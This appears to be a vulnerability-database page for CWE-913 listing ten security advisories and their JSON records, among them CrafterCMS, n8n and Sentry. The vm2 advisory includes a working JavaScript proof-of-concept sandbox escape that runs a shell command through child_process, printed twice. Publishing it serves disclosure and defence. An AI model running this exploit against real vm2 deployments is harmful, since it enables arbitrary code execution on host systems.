CWE-913
Allowed-with-ReviewImproper Control of Dynamically-Managed Code Resources
Abstraction: Class · Status: Incomplete
The product does not properly restrict reading from or writing to dynamically-managed code resources such as variables, objects, classes, attributes, functions, or executable instructions or statements.
159 vulnerabilities reference this CWE, most recent first.
GHSA-5644-3VGQ-2PH5
Vulnerability from github – Published: 2025-06-19 21:31 – Updated: 2025-06-20 13:28Improper Control of Dynamically-Managed Code Resources vulnerability in Crafter Studio of CrafterCMS allows authenticated developers to execute OS commands via Groovy Sandbox Bypass.
By inserting malicious Groovy elements, an attacker may bypass Sandbox restrictions and obtain RCE (Remote Code Execution).
This issue affects CrafterCMS: from 4.0.0 through 4.2.2.
{
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "org.craftercms:crafter-studio"
},
"ranges": [
{
"events": [
{
"introduced": "4.0.0"
},
{
"fixed": "4.3.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-6384"
],
"database_specific": {
"cwe_ids": [
"CWE-913"
],
"github_reviewed": true,
"github_reviewed_at": "2025-06-20T13:28:38Z",
"nvd_published_at": "2025-06-19T21:15:27Z",
"severity": "HIGH"
},
"details": "Improper Control of Dynamically-Managed Code Resources vulnerability in Crafter Studio of CrafterCMS allows authenticated developers to execute OS commands via Groovy Sandbox Bypass.\n\nBy inserting malicious Groovy elements, an attacker may bypass Sandbox restrictions and obtain RCE (Remote Code Execution).\n\nThis issue affects CrafterCMS: from 4.0.0 through 4.2.2.",
"id": "GHSA-5644-3vgq-2ph5",
"modified": "2025-06-20T13:28:38Z",
"published": "2025-06-19T21:31:20Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-6384"
},
{
"type": "WEB",
"url": "https://github.com/craftercms/studio/commit/471bbad07cf1f3b420529a020c1409ad57d48a4e"
},
{
"type": "WEB",
"url": "https://docs.craftercms.org/current/security/advisory.html#cv-2025061901"
},
{
"type": "PACKAGE",
"url": "https://github.com/craftercms/studio"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:H/AT:N/PR:H/UI:N/VC:L/VI:H/VA:H/SC:H/SI:H/SA:H",
"type": "CVSS_V4"
}
],
"summary": "Crafter Studio Groovy Sandbox Bypass"
}
GHSA-58PG-75F2-3JXJ
Vulnerability from github – Published: 2021-12-03 00:00 – Updated: 2021-12-04 00:01Authenticated users with Administrator or Developer roles may execute OS commands by SPEL Expression in Spring beans. SPEL Expression does not have security restrictions, which will cause attackers to execute arbitrary commands remotely (RCE).
{
"affected": [],
"aliases": [
"CVE-2021-23258"
],
"database_specific": {
"cwe_ids": [
"CWE-913"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2021-12-02T16:15:00Z",
"severity": "HIGH"
},
"details": "Authenticated users with Administrator or Developer roles may execute OS commands by SPEL Expression in Spring beans. SPEL Expression does not have security restrictions, which will cause attackers to execute arbitrary commands remotely (RCE).",
"id": "GHSA-58pg-75f2-3jxj",
"modified": "2021-12-04T00:01:15Z",
"published": "2021-12-03T00:00:28Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-23258"
},
{
"type": "WEB",
"url": "https://docs.craftercms.org/en/3.1/security/advisory.html#cv-2021120101"
}
],
"schema_version": "1.4.0",
"severity": []
}
GHSA-593M-55HH-J8GV
Vulnerability from github – Published: 2024-10-03 18:26 – Updated: 2024-10-04 16:32Impact
In case a Prototype Pollution vulnerability is present in a user's application or bundled libraries, the Sentry SDK could potentially serve as a gadget to exploit that vulnerability. The exploitability depends on the specific details of the underlying Prototype Pollution issue.
[!NOTE] This advisory does not indicate the presence of a Prototype Pollution within the Sentry SDK itself. Users are strongly advised to first address any Prototype Pollution vulnerabilities in their application, as they pose a more critical security risk.
Patches
The issue was patched in all Sentry JavaScript SDKs starting from the 8.33.0 version. Also, the fix was backported to SDK v7 in 7.119.1.
References
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "@sentry/browser"
},
"ranges": [
{
"events": [
{
"introduced": "8.0.0-alpha.1"
},
{
"fixed": "8.33.0"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "npm",
"name": "@sentry/browser"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "7.119.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-913"
],
"github_reviewed": true,
"github_reviewed_at": "2024-10-03T18:26:53Z",
"nvd_published_at": null,
"severity": "MODERATE"
},
"details": "### Impact\nIn case a Prototype Pollution vulnerability is present in a user\u0027s application or bundled libraries, the Sentry SDK could potentially serve as a gadget to exploit that vulnerability. The exploitability depends on the specific details of the underlying Prototype Pollution issue.\n\n\u003e [!NOTE]\n\u003e This advisory does not indicate the presence of a Prototype Pollution within the Sentry SDK itself. Users are strongly advised to first address any Prototype Pollution vulnerabilities in their application, as they pose a more critical security risk.\n\n### Patches\nThe issue was patched in all Sentry JavaScript SDKs starting from the [8.33.0](https://github.com/getsentry/sentry-javascript/releases/tag/8.33.0) version.\nAlso, the fix was backported to SDK v7 in [7.119.1](https://github.com/getsentry/sentry-javascript/releases/tag/7.119.1).\n\n### References\n* [Prototype Pollution](https://portswigger.net/web-security/prototype-pollution)\n* [Prototype Pollution gadgets](https://portswigger.net/web-security/prototype-pollution#prototype-pollution-gadgets)\n* [sentry-javascript#13838](https://github.com/getsentry/sentry-javascript/pull/13838)",
"id": "GHSA-593m-55hh-j8gv",
"modified": "2024-10-04T16:32:02Z",
"published": "2024-10-03T18:26:53Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/getsentry/sentry-javascript/security/advisories/GHSA-593m-55hh-j8gv"
},
{
"type": "WEB",
"url": "https://github.com/getsentry/sentry-javascript/pull/13838"
},
{
"type": "WEB",
"url": "https://github.com/getsentry/sentry-javascript/commit/35bdc87dee3498794e34c1ad35dd9927950c8766"
},
{
"type": "PACKAGE",
"url": "https://github.com/getsentry/sentry-javascript"
},
{
"type": "WEB",
"url": "https://github.com/getsentry/sentry-javascript/releases/tag/7.119.1"
},
{
"type": "WEB",
"url": "https://github.com/getsentry/sentry-javascript/releases/tag/8.33.0"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "Sentry SDK Prototype Pollution gadget in JavaScript SDKs"
}
GHSA-5FR5-6CWJ-9HP2
Vulnerability from github – Published: 2025-12-04 15:30 – Updated: 2025-12-04 15:30Improper control of dynamically-managed code resources vulnerability in WebAPI component in Synology DiskStation Manager (DSM) before 7.1.1-42962-8 and 7.2.1-69057-2 and 7.2.2-72806 and Synology Unified Controller (DSMUC) before 3.1.4-23079 allows remote authenticated users to obtain privileges without consent via unspecified vectors.
{
"affected": [],
"aliases": [
"CVE-2024-5401"
],
"database_specific": {
"cwe_ids": [
"CWE-913"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-12-04T15:15:54Z",
"severity": "MODERATE"
},
"details": "Improper control of dynamically-managed code resources vulnerability in WebAPI component in Synology DiskStation Manager (DSM) before 7.1.1-42962-8 and 7.2.1-69057-2 and 7.2.2-72806 and Synology Unified Controller (DSMUC) before 3.1.4-23079 allows remote authenticated users to obtain privileges without consent via unspecified vectors.",
"id": "GHSA-5fr5-6cwj-9hp2",
"modified": "2025-12-04T15:30:33Z",
"published": "2025-12-04T15:30:33Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-5401"
},
{
"type": "WEB",
"url": "https://www.synology.com/en-global/security/advisory/Synology_SA_24_27"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-5Q7C-3GJ2-48QW
Vulnerability from github – Published: 2024-01-12 21:30 – Updated: 2024-01-12 21:30NVIDIA DGX A100 SBIOS contains a vulnerability where a user may cause a dynamic variable evaluation by local access. A successful exploit of this vulnerability may lead to denial of service.
{
"affected": [],
"aliases": [
"CVE-2023-31032"
],
"database_specific": {
"cwe_ids": [
"CWE-627",
"CWE-913"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-01-12T19:15:10Z",
"severity": "HIGH"
},
"details": "NVIDIA DGX A100 SBIOS contains a vulnerability where a user may cause a dynamic variable evaluation by local access. A successful exploit of this vulnerability may lead to denial of service.",
"id": "GHSA-5q7c-3gj2-48qw",
"modified": "2024-01-12T21:30:19Z",
"published": "2024-01-12T21:30:19Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-31032"
},
{
"type": "WEB",
"url": "https://nvidia.custhelp.com/app/answers/detail/a_id/5510"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-5R9F-76WQ-X3P4
Vulnerability from github – Published: 2023-09-02 15:30 – Updated: 2024-04-04 07:22A vulnerability that poses a potential risk of polluting the MXsecurity sqlite database and the nsm-web UI has been identified in MXsecurity versions prior to v1.0.1. This vulnerability might allow an unauthenticated remote attacker to register or add devices via the nsm-web application.
{
"affected": [],
"aliases": [
"CVE-2023-39983"
],
"database_specific": {
"cwe_ids": [
"CWE-913",
"CWE-915"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2023-09-02T13:15:45Z",
"severity": "MODERATE"
},
"details": "A vulnerability that poses a potential risk of polluting the MXsecurity sqlite database and the nsm-web UI has been identified in MXsecurity versions prior to v1.0.1. This vulnerability might allow an unauthenticated remote attacker to register or add devices via the nsm-web application.\n\n",
"id": "GHSA-5r9f-76wq-x3p4",
"modified": "2024-04-04T07:22:22Z",
"published": "2023-09-02T15:30:18Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-39983"
},
{
"type": "WEB",
"url": "https://www.moxa.com/en/support/product-support/security-advisory/mpsa-230403-mxsecurity-series-multiple-vulnerabilities"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-5VGP-W563-7C6H
Vulnerability from github – Published: 2022-05-24 17:27 – Updated: 2024-01-01 00:30An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory, aka 'Windows Graphics Component Information Disclosure Vulnerability'. This CVE ID is unique from CVE-2020-1097.
{
"affected": [],
"aliases": [
"CVE-2020-1091"
],
"database_specific": {
"cwe_ids": [
"CWE-913"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2020-09-11T17:15:00Z",
"severity": "MODERATE"
},
"details": "An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory, aka \u0027Windows Graphics Component Information Disclosure Vulnerability\u0027. This CVE ID is unique from CVE-2020-1097.",
"id": "GHSA-5vgp-w563-7c6h",
"modified": "2024-01-01T00:30:41Z",
"published": "2022-05-24T17:27:58Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-1091"
},
{
"type": "WEB",
"url": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1091"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-6CQR-8CFR-67F8
Vulnerability from github – Published: 2026-02-04 18:03 – Updated: 2026-02-04 19:53Impact
Additional exploits in the expression evaluation of n8n have been identified and patched following CVE-2025-68613.
An authenticated user with permission to create or modify workflows could abuse crafted expressions in workflow parameters to trigger unintended system command execution on the host running n8n.
Patches
The issue has been fixed in n8n versions 1.123.17 and 2.5.2. Users should upgrade to these versions or later to remediate the vulnerability.
Workarounds
If upgrading is not immediately possible, administrators should consider the following temporary mitigations:
- Limit workflow creation and editing permissions to fully trusted users only.
- Deploy n8n in a hardened environment with restricted operating system privileges and network access to reduce the impact of potential exploitation.
These workarounds do not fully remediate the risk and should only be used as short-term mitigation measures.
Resources
- Best practices for securing n8n
- Initial vulnerability advisory: CVE-2025-68613
n8n has adopted CVSS 4.0 as primary score for all security advisories. CVSS 3.1 vector strings are provided for backward compatibility.
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "n8n"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.123.17"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "npm",
"name": "n8n"
},
"ranges": [
{
"events": [
{
"introduced": "2.0.0"
},
{
"fixed": "2.5.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-25049"
],
"database_specific": {
"cwe_ids": [
"CWE-913"
],
"github_reviewed": true,
"github_reviewed_at": "2026-02-04T18:03:09Z",
"nvd_published_at": "2026-02-04T17:16:22Z",
"severity": "CRITICAL"
},
"details": "### Impact\n\nAdditional exploits in the expression evaluation of n8n have been identified and patched following [CVE-2025-68613](https://github.com/n8n-io/n8n/security/advisories/GHSA-v98v-ff95-f3cp).\n\nAn authenticated user with permission to create or modify workflows could abuse crafted expressions in workflow parameters to trigger unintended system command execution on the host running n8n.\n\n### Patches\n\nThe issue has been fixed in n8n versions 1.123.17 and 2.5.2. Users should upgrade to these versions or later to remediate the vulnerability.\n\n### Workarounds\n\nIf upgrading is not immediately possible, administrators should consider the following temporary mitigations:\n\n- Limit workflow creation and editing permissions to fully trusted users only.\n- Deploy n8n in a hardened environment with restricted operating system privileges and network access to reduce the impact of potential exploitation.\n\nThese workarounds do not fully remediate the risk and should only be used as short-term mitigation measures.\n\n### Resources\n\n- Best practices for [securing n8n](https://docs.n8n.io/hosting/securing/overview/)\n- Initial vulnerability advisory: [CVE-2025-68613](https://github.com/n8n-io/n8n/security/advisories/GHSA-v98v-ff95-f3cp)\n\n---\n\nn8n has adopted CVSS 4.0 as primary score for all security advisories. CVSS 3.1 vector strings are provided for backward compatibility.\n\nCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
"id": "GHSA-6cqr-8cfr-67f8",
"modified": "2026-02-04T19:53:17Z",
"published": "2026-02-04T18:03:09Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/n8n-io/n8n/security/advisories/GHSA-6cqr-8cfr-67f8"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25049"
},
{
"type": "WEB",
"url": "https://github.com/n8n-io/n8n/commit/7860896909b3d42993a36297f053d2b0e633235d"
},
{
"type": "WEB",
"url": "https://github.com/n8n-io/n8n/commit/936c06cfc1ad269a89e8ef7f8ac79c104436d54b"
},
{
"type": "PACKAGE",
"url": "https://github.com/n8n-io/n8n"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H",
"type": "CVSS_V4"
}
],
"summary": "n8n Has Expression Escape Vulnerability Leading to RCE"
}
GHSA-6HR3-77QJ-W9W9
Vulnerability from github – Published: 2022-05-14 02:04 – Updated: 2022-05-14 02:04distribute-cache.c in ImageMagick re-uses objects after they have been destroyed, which allows remote attackers to have unspecified impact via unspecified vectors.
{
"affected": [],
"aliases": [
"CVE-2014-9852"
],
"database_specific": {
"cwe_ids": [
"CWE-913"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2017-03-17T14:59:00Z",
"severity": "CRITICAL"
},
"details": "distribute-cache.c in ImageMagick re-uses objects after they have been destroyed, which allows remote attackers to have unspecified impact via unspecified vectors.",
"id": "GHSA-6hr3-77qj-w9w9",
"modified": "2022-05-14T02:04:43Z",
"published": "2022-05-14T02:04:43Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2014-9852"
},
{
"type": "WEB",
"url": "https://anonscm.debian.org/cgit/collab-maint/imagemagick.git/commit/?h=debian-patches/6.8.9.9-4-for-upstream\u0026id=37ec7d53dcb99fbd1f5c33442594d5e279630563"
},
{
"type": "WEB",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1343512"
},
{
"type": "WEB",
"url": "http://lists.opensuse.org/opensuse-security-announce/2016-07/msg00002.html"
},
{
"type": "WEB",
"url": "http://lists.opensuse.org/opensuse-security-announce/2016-07/msg00011.html"
},
{
"type": "WEB",
"url": "http://lists.opensuse.org/opensuse-security-announce/2016-07/msg00018.html"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2016/06/02/13"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-6J2X-VHQR-QR7Q
Vulnerability from github – Published: 2026-05-29 17:51 – Updated: 2026-06-12 20:55Summary
A sandbox escape vulnerability in vm2 allows arbitrary code execution in the host process when untrusted code is executed with async support on runtimes exposing WebAssembly JSPI (WebAssembly.promising / WebAssembly.Suspending). In the tested configuration, a JSPI-backed Promise can reach Promise.prototype.finally() in a way that bypasses the expected Promise-species hardening and exposes a host-originated rejection object to attacker-controlled species logic, breaking the sandbox boundary.
This is a critical sandbox escape: any application that treats vm2 as a security boundary may be fully compromised.
Details
On node26, JSPI-backed Promises created through WebAssembly.promising(...) do not behave like ordinary sandbox Promises.
That path yields a host-originated TypeError during JSPI processing. Inside attacker-controlled species logic reached through .finally(), the rejection object exposes a usable host constructor chain. In the tested environment, the rejection object's constructor path can be used to reach host process, which leads to arbitrary code execution in the host process.
This behavior is specific to the JSPI / .finally() interaction. In contrast, the corresponding then / catch paths still appeared to route through vm2's expected localPromise machinery in my testing.
PoC
Environment: node:26-bookworm
const {VM} = require("vm2");
const vm = new VM();
console.log(vm.run(`
(()=>{let b=Uint8Array.of(0,97,115,109,1,0,0,0,1,4,1,96,0,0,2,7,1,1,109,1,102,0,0,3,2,1,0,7,7,1,3,114,117,110,0,1,10,6,1,4,0,16,0,11);WebAssembly.instantiate(b,{m:{f:new WebAssembly.Suspending(()=>WebAssembly.compileStreaming(Promise.resolve(0)))}}).then(r=>{let p=WebAssembly.promising(r.instance.exports.run)();class F{constructor(x){this.s=0;this.q=[];x(v=>{this.s=1;this.v=v;for(let i of this.q)if(i[0])i[0](v)},e=>{
let P=e.constructor.constructor('return process')()
P.mainModule.require('child_process').execSync('touch pwned');
this.s=2;this.v=e;for(let i of this.q)if(i[1])i[1](e)})}then(f,r){if(this.s==1)return f?f(this.v):this.v;if(this.s==2){if(r)return r(this.v);throw this.v}this.q.push([f,r]);return 0}}Object.defineProperty(F,Symbol.species,{get(){return F}});Object.defineProperty(p,'constructor',{get(){return F}});p.finally(()=>{})});return 1})()
`));
Impact
This is a sandbox escape leading to arbitrary code execution in the host process.
Who is impacted:
- any application using
vm2to execute attacker-controlled JavaScript as a security boundary - especially Node.js runtimes exposing WebAssembly JSPI features (Node 26)
Practical impact:
- arbitrary command execution in the host process
- arbitrary file read / write accessible to the host process
- theft of secrets, tokens, credentials, and application data
- complete compromise of services relying on
vm2isolation
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 3.11.3"
},
"package": {
"ecosystem": "npm",
"name": "vm2"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.11.4"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-47210"
],
"database_specific": {
"cwe_ids": [
"CWE-913"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-29T17:51:05Z",
"nvd_published_at": "2026-06-12T15:16:29Z",
"severity": "CRITICAL"
},
"details": "### Summary\nA sandbox escape vulnerability in `vm2` allows arbitrary code execution in the host process when untrusted code is executed with async support on runtimes exposing WebAssembly JSPI (`WebAssembly.promising` / `WebAssembly.Suspending`). In the tested configuration, a JSPI-backed Promise can reach `Promise.prototype.finally()` in a way that bypasses the expected Promise-species hardening and exposes a host-originated rejection object to attacker-controlled species logic, breaking the sandbox boundary.\n\nThis is a critical sandbox escape: any application that treats `vm2` as a security boundary may be fully compromised.\n\n### Details\n\nOn node26, JSPI-backed Promises created through `WebAssembly.promising(...)` do not behave like ordinary sandbox Promises.\n\nThat path yields a host-originated `TypeError` during JSPI processing. Inside attacker-controlled species logic reached through `.finally()`, the rejection object exposes a usable host constructor chain. In the tested environment, the rejection object\u0027s constructor path can be used to reach host `process`, which leads to arbitrary code execution in the host process.\n\nThis behavior is specific to the JSPI / `.finally()` interaction. In contrast, the corresponding `then` / `catch` paths still appeared to route through `vm2`\u0027s expected `localPromise` machinery in my testing.\n\n### PoC\nEnvironment: node:26-bookworm\n```javascript\nconst {VM} = require(\"vm2\");\nconst vm = new VM();\nconsole.log(vm.run(`\n(()=\u003e{let b=Uint8Array.of(0,97,115,109,1,0,0,0,1,4,1,96,0,0,2,7,1,1,109,1,102,0,0,3,2,1,0,7,7,1,3,114,117,110,0,1,10,6,1,4,0,16,0,11);WebAssembly.instantiate(b,{m:{f:new WebAssembly.Suspending(()=\u003eWebAssembly.compileStreaming(Promise.resolve(0)))}}).then(r=\u003e{let p=WebAssembly.promising(r.instance.exports.run)();class F{constructor(x){this.s=0;this.q=[];x(v=\u003e{this.s=1;this.v=v;for(let i of this.q)if(i[0])i[0](v)},e=\u003e{\n let P=e.constructor.constructor(\u0027return process\u0027)()\n P.mainModule.require(\u0027child_process\u0027).execSync(\u0027touch pwned\u0027);\n this.s=2;this.v=e;for(let i of this.q)if(i[1])i[1](e)})}then(f,r){if(this.s==1)return f?f(this.v):this.v;if(this.s==2){if(r)return r(this.v);throw this.v}this.q.push([f,r]);return 0}}Object.defineProperty(F,Symbol.species,{get(){return F}});Object.defineProperty(p,\u0027constructor\u0027,{get(){return F}});p.finally(()=\u003e{})});return 1})()\n`));\n```\n\n### Impact\nThis is a **sandbox escape leading to arbitrary code execution in the host process**.\n\nWho is impacted:\n\n- any application using `vm2` to execute attacker-controlled JavaScript as a security boundary\n- especially Node.js runtimes exposing WebAssembly JSPI features (Node 26)\n\nPractical impact:\n\n- arbitrary command execution in the host process\n- arbitrary file read / write accessible to the host process\n- theft of secrets, tokens, credentials, and application data\n- complete compromise of services relying on `vm2` isolation",
"id": "GHSA-6j2x-vhqr-qr7q",
"modified": "2026-06-12T20:55:08Z",
"published": "2026-05-29T17:51:05Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/patriksimek/vm2/security/advisories/GHSA-6j2x-vhqr-qr7q"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-47210"
},
{
"type": "WEB",
"url": "https://github.com/patriksimek/vm2/commit/6915fa4d9bcebd47b9a4f39a1adc1aa94ef6ffc6"
},
{
"type": "PACKAGE",
"url": "https://github.com/patriksimek/vm2"
},
{
"type": "WEB",
"url": "https://github.com/patriksimek/vm2/releases/tag/v3.11.4"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "vm2 sandbox escape via JSPI-backed Promise `.finally()` species bypass"
}
Mitigation
Strategy: Input Validation
For any externally-influenced input, check the input against an allowlist of acceptable values.
Mitigation
Strategy: Refactoring
Refactor the code so that it does not need to be dynamically managed.
No CAPEC attack patterns related to this CWE.